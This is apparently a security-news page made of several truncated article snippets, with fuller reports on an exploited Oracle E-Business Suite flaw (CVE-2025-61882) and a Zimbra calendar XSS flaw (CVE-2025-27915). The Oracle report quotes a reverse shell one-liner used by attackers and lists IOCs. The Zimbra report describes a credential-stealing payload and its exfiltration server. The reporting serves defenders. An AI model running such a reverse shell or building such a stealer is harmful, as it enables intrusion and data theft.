SpyCloud Labs analysts have successfully reverse-engineered Asgard Protector, a sophisticated crypter tool prominently used to hide malicious payloads from antivirus detection systems. This crypter has gained particular notoriety for being the preferred choice among sellers of LummaC2, currently the most prevalent commodity infostealer in the cyberthreat landscape. The analysis reveals intricate evasion techniques that demonstrate the evolving […]
QNAP Systems has disclosed a critical security vulnerability in its NetBak Replicator software that could enable local attackers to execute malicious code on affected systems. The vulnerability, tracked as CVE-2025-57714, stems from an unquoted search path element flaw that poses significant security risks to organizations using the backup solution. Vulnerability Details and Impact Assessment The […]
A critical zero-day vulnerability in Oracle E-Business Suite has emerged as a significant threat to enterprise environments, with proof-of-concept (PoC) exploit code now publicly available.
CVE-2025-61882 presents a severe security risk, achieving a maximum CVSS 3.1 score of 9.8 and enabling remote code execution without authentication across multiple Oracle E-Business Suite versions.
The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14, specifically targeting the Oracle Concurrent Processing BI Publisher Integration component via the HTTP protocol.
Oracle E-Business Suite RCE Vulnerability
Security researchers have identified a flaw that allows unauthenticated remote attackers to execute arbitrary code on vulnerable systems through network-based exploitation with low attack complexity.
Oracle’s security advisory emphasizes the vulnerability’s classification as “remotely exploitable without authentication,” meaning attackers can leverage network access without requiring valid credentials.
The vulnerability’s attack vector utilizes HTTP communications, with the scope remaining unchanged but delivering high impact across confidentiality, integrity, and availability metrics.
Organizations can detect vulnerable instances using Nuclei detection templates that check for “E-Business Suite Home Page” text while comparing Last-Modified header timestamps against October 4, 2025.
The Oracle October 2023 Critical Patch Update serves as a prerequisite for applying the necessary security patches. Systems with modification dates preceding this threshold indicate unpatched installations susceptible to exploitation.
Risk Factors
Details
Affected Products
Oracle E-Business Suite 12.2.3-12.2.14
Impact
Remote Code Execution
Exploit Prerequisites
Network access via HTTP protocol, No authentication required
CVSS 3.1 Score
9.8 (Critical)
Active Exploitation
Active exploitation attempts have been documented through specific Indicators of Compromise (IOCs), including malicious IP addresses 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 conducting GET and POST activities.
Threat actors are utilizing reverse shell commands such as sh -c /bin/bash -i >& /dev/tcp// 0>&1 to establish outbound TCP connections for persistent access.
Forensic analysis reveals malicious artifacts including the exploitation toolkit oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) containing Python exploitation scripts exp.py and server.py.
These tools demonstrate sophisticated attack methodologies potentially linked to known threat groups, including references to Scattered Spider, Lapsus$, and Cl0p ransomware operations.
Oracle strongly recommends the immediate deployment of patches across all affected E-Business Suite installations, emphasizing that only systems under Premier Support or Extended Support receive security updates.
Organizations should implement network monitoring for the identified IOCs while conducting comprehensive vulnerability assessments using available detection templates and Shodan queries targeting html:”OA_HTML” patterns to identify exposed instances.
Red team researchers have unveiled XRayC2, a sophisticated command-and-control framework that weaponizes Amazon Web Services’ X-Ray distributed application tracing service to establish covert communication channels. This innovative technique demonstrates how attackers can abuse legitimate cloud monitoring infrastructure to bypass traditional network security controls. Diagram explaining command and control (C2) servers used by attackers to control […]
A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military.
Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient sanitization of HTML content in ICS calendar files,
The cybersecurity landscape continues to evolve as threat actors behind the WARMCOOKIE backdoor malware have significantly enhanced their capabilities, introducing new features and maintaining active development despite law enforcement disruptions. The latest WARMCOOKIE variants demonstrate the threat actors’ commitment to expanding their operational toolkit. Four new command handlers have been integrated into the malware’s architecture […]
Oracle has issued an urgent security alert for a critical zero-day vulnerability affecting Oracle E-Business Suite that allows remote code execution without authentication. The vulnerability, tracked as CVE-2025-61882, has now received public proof-of-concept detection capabilities from cybersecurity researcher rxerium. Illustration showing a hacker and icons representing cyber threats with a caption about the $10.5 trillion economic […]
A proof-of-concept exploit has been released for CVE-2025-32463, a critical local privilege escalation vulnerability affecting the Sudo binary that allows attackers to gain root access on Linux systems. The flaw was discovered by security researcher Rich Mirch and has garnered significant attention from the cybersecurity community. Critical Vulnerability in Sudo Binary CVE-2025-32463 represents a serious […]
Oracle has released an emergency update to address a critical security flaw in its E-Business Suite that it said has been exploited in the recent wave of Cl0p data theft attacks.
The vulnerability, tracked as CVE-2025-61882 (CVSS score: 9.8), concerns an unspecified bug that could allow an unauthenticated attacker with network access via HTTP to compromise and take control of the Oracle
A zero-day vulnerability in the Zimbra Collaboration Suite (ZCS) was actively exploited in targeted attacks earlier in 2025.
The flaw, identified as CVE-2025-27915, is a stored cross-site scripting (XSS) vulnerability that attackers leveraged by sending weaponized iCalendar (.ICS) files to steal sensitive data from victims’ email accounts.
The attacks were first identified by StrikeReady, which began monitoring for unusually large iCalendar files that contained JavaScript.
One notable attack targeted Brazil’s military, where an attacker, using an IP address of 193.29.58.37, spoofed the Libyan Navy’s Office of Protocol to deliver the then-unknown exploit.
The core of the issue lies within Zimbra’s Classic Web Client, which failed to properly sanitize HTML content within iCalendar files. This allowed threat actors to embed malicious JavaScript inside a .ICS attachment.
When a user opened an email containing the malicious calendar entry, the script would execute within the user’s active session.
This XSS vulnerability, often considered less severe than remote code execution (RCE) flaws, proved highly effective.
It enabled attackers to run arbitrary code to perform unauthorized actions, including data exfiltration and session hijacking, without the user’s knowledge.
Zimbra addressed the vulnerability on January 27, 2025, by releasing patches (versions 9.0.0 P44, 10.0.13, and 10.1.5), though evidence shows the exploit was used before the fix was available.
A Comprehensive Data-Stealing Payload
The JavaScript payload delivered through the exploit is a sophisticated data stealer designed specifically for Zimbra webmail. Its capabilities include:
Credential Theft: It creates hidden form fields to capture usernames and passwords from login pages.
Data Exfiltration: The script is programmed to steal a wide array of information, including emails, contacts, distribution lists, shared folders, scratch codes, and trusted device information. The stolen data is sent to an attacker-controlled server at https://ffrk.net/apache2_config_default_51_2_1.
Activity Monitoring: It monitors user activity and, if a user is inactive, triggers data theft before logging them out.
Email Forwarding: The malware adds a malicious email filter rule named “Correo” to automatically forward the victim’s emails to an external address, spam_to_junk@proton.me.
Evasion Techniques: To avoid detection, the script employs a 60-second delay before execution, limits its execution to once every three days, and hides user interface elements to conceal its activity.
While direct attribution remains unconfirmed, researchers note the tactics are similar to those used by a prolific Russian-linked threat actor and the group UNC1151, which has been linked to the Belarusian government.
This incident underscores the significant threat posed by XSS vulnerabilities in enterprise environments and the importance of applying security patches promptly.
